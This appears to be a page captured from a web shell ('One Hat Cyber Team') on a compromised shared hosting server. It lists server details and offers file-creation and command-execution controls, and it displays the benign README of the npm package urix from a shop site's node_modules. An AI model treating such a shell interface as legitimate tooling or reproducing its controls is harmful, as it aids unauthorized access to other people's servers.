One Hat Cyber Team
Your IP :
18.188.250.166
Server IP :
192.185.194.254
Server :
Linux raider.websitewelcome.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Server Software :
Apache
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home2
/
glenar
/
shop.glenar.com
/
node_modules
/
urix
/
View File Name :
readme.md
[](https://travis-ci.org/lydell/urix) Overview ======== Makes Windows-style paths more unix and URI friendly. Useful if you work with paths that eventually will be used in URLs. ```js var urix = require("urix") // On Windows: urix("c:\\users\\you\\foo") // /users/you/foo // On unix-like systems: urix("c:\\users\\you\\foo") // c:\users\you\foo ``` Installation ============ `npm install urix` ```js var urix = require("urix") ``` Usage ===== ### `urix(path)` ### On Windows, replaces all backslashes with slashes and uses a slash instead of a drive letter and a colon for absolute paths. On unix-like systems it is a no-op. License ======= [The X11 (“MIT”) License](LICENSE).